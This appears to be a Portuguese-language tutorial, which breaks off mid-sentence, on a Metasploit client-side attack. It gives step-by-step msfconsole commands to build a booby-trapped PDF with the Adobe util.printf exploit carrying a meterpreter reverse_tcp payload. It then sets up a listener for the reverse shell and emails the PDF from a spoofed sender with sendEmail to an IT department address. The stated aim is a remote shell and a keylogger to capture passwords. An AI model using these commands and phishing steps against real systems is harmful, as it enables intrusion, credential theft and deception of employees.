Você está na página 1de 9

O Metasploit tem muitas funes, uma delas a capacidade de executar ataques no lado do cliente (Client side attacks).

. No mundo da segurana, a engenharia social tornou-se um vetor de ataque cada vez mais utilizado. Mesmo que mude as tecnologias, uma coisa que parece permanecer a falta de segurana com as pessoas. Devido a isso, a engenharia social se tornou o principal tema da segurana no mundo de hoje. Nesse cenrio o atacante fez uma grande coleta de informaes usando ferramentas como o Metasploit Framework, Maltego e outras ferramentas para coletar endereos de e-mail e informaes dos usurios com o objetivo de lanar um ataque de engenharia social do lado do cliente sobre a empresa.

Depois do sucesso da (raspagem) de e-mails a partir da web, ele

Conseguiu duas informaes -chave.


1) A empresa usa "O melhores computadores" para os servios tcnicos. 2) O departamento de TI tem um endereo de e-mail

itdept@victim.com Queremos ganhar shell no computador do departamentos de TI e executar um keylogger para obter senhas ou quaisquer outras informaes teis.
Vamos comeamos carregando nosso msfconsole. Depois de carregado iremos criar um PDF malicioso que vai dar

vtima uma sensao de segurana em abri-lo. http://www.social-engineer.org Para fazer isso, ele deve parecer legitimo, ter um ttulo realista, e no ser pego por anti-vrus ou outro software de segurana qualquer.

Ns iremos usar o Adobe Reader util.printf() JavaScript Function

Stack Buffer Overflow Vulnerability.


O Adobe Reader propenso a falhas de buffer overflow porque o

aplicativo no executa verificaes de limite adequado sobre dados fornecidos pelo usurio.
Um atacante pode explorar esta questo para executar cdigo arbitrrio

com os privilgios do usurio que est executando a aplicao ou falha do pedido, negando servio aos usurios legtimos.
Ento, vamos comear criando nosso arquivo PDF malicioso para uso

neste ataque.

#msf> use exploit/windows/fileformat/adobe_utilprintf #msf> exploit (adobe_utilprintf) > set FILENAME

BeastComputers-UpgradeInstructions.pdf #msf> exploit (adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp #msf> exploit (adobe_utilprintf) > set LHOST 192.168.8.128 #msf> exploit (adobe_utilprintf) > set LPORT 4455 #msf> exploit (adobe_utilprintf) > show options

J que temos todas as opes setadas hora de definir a forma como ns queremos, executar o "exploit" para criar o nosso arquivo malicioso.

Assim, podemos ver que o nosso arquivo PDF foi criado em um subdiretrio de onde estamos. Agora s copi-lo para o nosso diretrio /tmp ou outro de sua preferncia. Antes de enviar o arquivo malicioso para nossa vtima preciso configurar um ouvinte para receber a conexo remota. Vamos usar o msfconsole para montar o nosso ouvinte multi handler.

#msf> use exploit/multi/handler #msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp #msf exploit (handler) > set LPORT 4455 #msf exploit (handler) > set LHOST 192.168.8.128 #msf exploit (handler) > exploit Agora que o nosso ouvinte est escutando para receber o seu payload malicioso, temos que entregar este payload para a vtima e como j temos o endereo de email do departamento de TI, podemos utilizar um script til do sendEmail para entregar o payload para a vtima ou um dos programas j apresentados nessa palestra. Podemos anexar o PDF malicioso, utilize qualquer servidor SMTP que quiser, e escreva um e-mail bastante convincente de qualquer endereo que quiser.

sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com - 192.168.8.131 -u Important Upgrade Instrunctions -a /tmp/Beastcomputers-UpgradeINstructions.pdf

Como podemos ver aqui, o script que nos permite colocar qualquer endereo FROM (-f), qualquer TO (-t), qualquer servidor SMTP (-s), bem como Ttulos (-u) e nosso arquivo malicioso (-a). Aps fazermos tudo isso s pressionamos enter e digitar qualquer mensagem que quisermos, em seguida, pressionar CTRL + D e ser enviado o email para a vtima. Agora s aguardar que um estagirio do departamento de TI abra o email, salve em uma pasta qualquer, passe o antivrus, como o antivrus no encontrar nada de anormal ele tem mais de 50% de chance de executar.

Ao clicar no arquivo o Adobe abre e mostra uma janela cinzenta, que nunca revela o contedo do PDF...